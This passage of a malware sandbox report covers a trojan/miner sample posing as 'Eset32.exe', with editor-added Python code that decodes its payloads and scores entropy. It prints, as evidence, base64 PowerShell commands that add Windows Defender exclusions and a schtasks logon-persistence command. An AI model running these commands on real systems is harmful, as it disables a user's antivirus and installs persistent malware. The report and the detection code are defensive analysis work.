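The process tree above records the sample's two -EncodedCommand payloads and its schtasks persistence verbatim but never shows what the base64 decodes to. The following is an editor-added Python example, not part of the sandbox output or of the sample: it decodes the -EncodedCommand arguments (base64 of UTF-16LE text, which is what powershell.exe expects) and applies triage rules of the editor's own design to the three command lines copied from this report. The finding tags and the abbreviation handling for -e/-ec/-enc are assumptions of the example, not sandbox signatures.

```python
"""Editor-added example: decode -EncodedCommand payloads recorded in the
report and triage the process tree for Defender tampering and
scheduled-task persistence. Command lines are copied from the report;
the rules and tags are the editor's own."""
import base64
import re
from typing import List, Optional, Tuple

# Command lines copied verbatim from the report's process tree.
REPORT_CMDLINES = [
    'powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"',
    'powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="',
    r'schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe"',
]

# powershell.exe resolves parameter prefixes, so -e, -ec, -en, -enc ... all
# select -EncodedCommand, while -ex... selects -ExecutionPolicy; the pattern
# below accepts the former and rejects the latter (assumption of this example).
ENCODED_RE = re.compile(r'-(?:e|ec|en[a-z]*)\s+"?([A-Za-z0-9+/=]+)"?', re.IGNORECASE)

# Add-MpPreference with an exclusion parameter: the sample carves the user
# profile, the system drive and every .exe/.dll out of Defender scanning.
DEFENDER_EXCLUSION_RE = re.compile(
    r"Add-MpPreference\b.*-Exclusion(?:Path|Extension|Process|IpAddress)",
    re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the plaintext behind -EncodedCommand, or None if absent.
    Base64 padding is restored first, since attackers sometimes strip it
    to break naive decoders (PowerShell itself tolerates the omission)."""
    match = ENCODED_RE.search(cmdline)
    if not match:
        return None
    b64 = match.group(1)
    raw = base64.b64decode(b64 + "=" * (-len(b64) % 4))
    return raw.decode("utf-16-le")


def triage_cmdline(cmdline: str) -> Tuple[Optional[str], List[str]]:
    """Return (decoded payload or None, ordered list of finding tags)."""
    findings: List[str] = []
    decoded = decode_encoded_command(cmdline)
    # Rules run against the decoded payload when there is one, so encoding
    # does not hide the Add-MpPreference call.
    effective = decoded if decoded is not None else cmdline
    if DEFENDER_EXCLUSION_RE.search(effective):
        findings.append("defender-exclusion-tamper")
    low = cmdline.lower()
    if re.search(r"\bschtasks(?:\.exe)?\b", low) and "/create" in low:
        findings.append("schtasks-create")
        if "/sc onlogon" in low:
            findings.append("schtasks-onlogon")
        if "/rl highest" in low:
            findings.append("schtasks-highest-runlevel")
        target = re.search(r'/tr\s+"?([^"]+)', cmdline, re.IGNORECASE)
        if target and "\\appdata\\" in target.group(1).lower():
            findings.append("schtasks-target-in-appdata")
    return decoded, findings


if __name__ == "__main__":
    for cmd in REPORT_CMDLINES:
        decoded, findings = triage_cmdline(cmd)
        print(cmd[:60] + "...")
        print("  decoded :", decoded)
        print("  findings:", ", ".join(findings) or "none")
```

Both payloads decode to Add-MpPreference calls (-ExclusionPath over $env:UserProfile and $env:SystemDrive, then -ExclusionExtension over exe and dll), which is why the dropped miner survives on a host with Defender enabled; a logon task created with /rl highest from a user-writable AppData path is the persistence half of the same picture.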
Source: C:\Users\user\Desktop\Eset32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\Eset32.exe Code function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\AppData\Roaming\12.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%bqqlraak%'
            Source: C:\Users\user\Desktop\Eset32.exe File created: C:\Users\user\AppData\Roaming\12.exe
            Source: C:\Users\user\Desktop\Eset32.exe File created: C:\Users\user\AppData\Local\Temp\nse1954.tmp
            Source: classification engine Classification label: mal100.troj.evad.mine.winEXE@40/23@1/1
            Source: C:\Users\user\Desktop\Eset32.exe Code function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar
            Source: C:\Users\user\Desktop\Eset32.exe File read: C:\Users\desktop.ini
            Source: C:\Users\user\Desktop\Eset32.exe Code function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA
Source: C:\Users\user\AppData\Roaming\12.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: sihost64.exe.26.dr, tbydbmombqjohqmyfjzgtsxmneyqjriqdnvyvzl.cs Base64 encoded string: '+tUaXCFqKQxQgYaTvUovoUHuWOpze7zpkxmzwPiHS1L77myXAP8rJGsY9I6PQMsb+fZwXVVGlWTrqMbStrpVAk35i+AMV30GvWG5r1UHh4k=', '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'
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5408:120:WilError_01
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_01
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6684:120:WilError_01
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5668:120:WilError_01
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Mutant created: \Sessions\1\BaseNamedObjects\9D16FBEF0D8A8F87529DE06A1C43C737
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4844:120:WilError_01
            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6584:120:WilError_01
            Source: 12.exe, 00000001.00000002.551168109.0000000000C3C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ;.VBp
            Source: 4.3.1.exe.2610000.0.unpack, u000fu2001.cs Cryptographic APIs: 'CreateDecryptor'
            Source: 6.2.AppLaunch.exe.400000.0.unpack, u000fu2001.cs Cryptographic APIs: 'CreateDecryptor'
            Source: sihost64.exe.26.dr, hGyH41UKf7PVMXME4b/HhVNFb05swtoHa1jYm.cs Cryptographic APIs: 'CreateDecryptor'
            Source: sihost64.exe.26.dr, hGyH41UKf7PVMXME4b/HhVNFb05swtoHa1jYm.cs Cryptographic APIs: 'CreateDecryptor'
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: Eset32.exe Static file information: File size 4139932 > 1048576
            Source: Eset32.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: C:\projects\dotnetzip-semverd\src\Zip\obj\Release\DotNetZip.pdb source: 1.exe, 00000004.00000003.433262708.0000000002612000.00000040.00001000.00020000.00000000.sdmp, 1.exe, 00000004.00000002.433791167.0000000000114000.00000004.00000010.00020000.00000000.sdmp, AppLaunch.exe, 00000006.00000002.705990964.0000000000402000.00000020.00000400.00020000.00000000.sdmp

            Data Obfuscation

Source: 4.3.1.exe.2610000.0.unpack, u0003u2001.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: 6.2.AppLaunch.exe.400000.0.unpack, u0003u2001.cs .Net Code: \x02 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
            Source: sihost64.exe.26.dr, hGyH41UKf7PVMXME4b/HhVNFb05swtoHa1jYm.cs .Net Code: stackVariable2.GetMethod("GetDelegateForFunctionPointer", V_0)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF9F09B6905 pushad ; ret 10_2_00007FF9F09B6909
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF9F09B6ABB push ebx; ret 10_2_00007FF9F09B6ACA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF9F09B6FFB pushad ; ret 10_2_00007FF9F09B702A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF9F09B4FFD push eax; iretd 10_2_00007FF9F09B50A1
            Source: 1.exe.0.dr Static PE information: section name: .QDwHSV
            Source: 1.exe.0.dr Static PE information: section name: .5{mr
            Source: initial sample Static PE information: section name: .5{mr entropy: 7.37490232947
            Source: sihost64.exe.26.dr, tbydbmombqjohqmyfjzgtsxmneyqjriqdnvyvzl.cs High entropy of concatenated method names: 'Main', 'uvoheezyq', 'ddtorxeqzaqxgbwo', 'vuxehejqeitboxwk', 'qxysbnhiviczdhccctzcmvprhcasrtobbs', '.ctor', '.cctor', 'X2ITMCRetNaZuIEaVu', 'jfBHNMAwpHEwauCEtA', 'bJtNW7nClCFlOQmmHt'
            Source: sihost64.exe.26.dr, hGyH41UKf7PVMXME4b/HhVNFb05swtoHa1jYm.cs High entropy of concatenated method names: '.cctor', 'Ko4fgi8Si2i54', 'nX3eSP3Yx', 'wQ3NoJxUC', 'BBw0ksC92', 'ITsU20Evp', 'fEMwQFcLn', 'w3Hv3hVNF', 'V5sSwtoHa', 'SjY8mSGyH'
            Source: C:\Users\user\Desktop\Eset32.exe File created: C:\Users\user\AppData\Roaming\12.exe
            Source: C:\Users\user\AppData\Roaming\12.exe File created: C:\Users\user\AppData\Roaming\Windows\System.exe
            Source: C:\Users\user\AppData\Roaming\Windows\System.exe File created: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe
            Source: C:\Users\user\Desktop\Eset32.exe File created: C:\Users\user\AppData\Roaming\1.exe
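Two of the Data Obfuscation findings above rest on the same measurement: the 7.3749 entropy of the '.5{mr' section in 1.exe, and the "high entropy of concatenated method names" in sihost64.exe. The following editor-added Python example, not part of the sandbox output or of the sample, implements that measurement (Shannon entropy in bits per symbol) and applies it both to constructed section bytes and to the method names copied from the report, next to a constructed list of ordinary .NET identifiers for contrast. The 7.0 packed-section threshold and the control names are assumptions of the example, not values documented by the sandbox.

```python
"""Editor-added example (not from the report or the sample): the entropy
heuristic behind the section-entropy and method-name findings above.
The threshold and the control identifiers are this example's assumptions."""
import math
from collections import Counter
from typing import Sequence, Union

# Assumed cut-off: compressed or encrypted data approaches the 8-bit
# ceiling, while ordinary x86 machine code sits well below it.
PACKED_SECTION_THRESHOLD = 7.0


def shannon_entropy(data: Union[bytes, str]) -> float:
    """Bits per symbol: 0.0 for a constant input, 8.0 for uniformly
    distributed bytes. Works on a byte string (a PE section) or a text
    string (identifiers joined together)."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def looks_packed(section_bytes: bytes) -> bool:
    """Flag a section whose byte entropy is near the ceiling; the report
    measures 7.3749 for the '.5{mr' section of 1.exe."""
    return shannon_entropy(section_bytes) >= PACKED_SECTION_THRESHOLD


def identifier_entropy(names: Sequence[str]) -> float:
    """Entropy of all method names concatenated, the metric behind the
    'High entropy of concatenated method names' finding."""
    return shannon_entropy("".join(names))


# Method names copied from the report's sihost64.exe finding.
OBFUSCATED_NAMES = [
    'Main', 'uvoheezyq', 'ddtorxeqzaqxgbwo', 'vuxehejqeitboxwk',
    'qxysbnhiviczdhccctzcmvprhcasrtobbs', '.ctor', '.cctor',
    'X2ITMCRetNaZuIEaVu', 'jfBHNMAwpHEwauCEtA', 'bJtNW7nClCFlOQmmHt',
]
# Constructed control: what unobfuscated .NET method names look like.
PLAIN_NAMES = ['Main', 'GetConfig', 'LoadSettings', 'ConnectToServer',
               'SendHeartbeat', 'Dispose']

# Constructed stand-ins for section contents (no real PE is parsed here):
# a repetitive x86 prologue/epilogue pattern versus a flat byte distribution.
PLAIN_CODE_SECTION = bytes([0x55, 0x8B, 0xEC, 0x83, 0xEC, 0x10, 0x90, 0xC3] * 64)
RANDOM_LIKE_SECTION = bytes(range(256)) * 16


if __name__ == "__main__":
    for label, blob in (("plain code section", PLAIN_CODE_SECTION),
                        ("random-like section", RANDOM_LIKE_SECTION)):
        print(f"{label:<20} entropy={shannon_entropy(blob):.3f} packed={looks_packed(blob)}")
    print(f"plain method names   entropy={identifier_entropy(PLAIN_NAMES):.3f}")
    print(f"obfuscated names     entropy={identifier_entropy(OBFUSCATED_NAMES):.3f}")
```

The two obfuscated name lists in the report come from the same renaming pass: the identifiers draw on the whole alphanumeric range with no word structure, so their joined entropy lands well above that of ordinary camel-case names; a section entropy above about 7 bits says the bytes are compressed or encrypted, consistent with the in-memory Assembly.Load(byte[]) noted above.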

            Boot Survival

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes
Source: C:\Users\user\Desktop\Eset32.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\12.exe Process information set: NOOPENFILEERRORBOX (27 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe Process information set: NOOPENFILEERRORBOX (19 identical entries)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
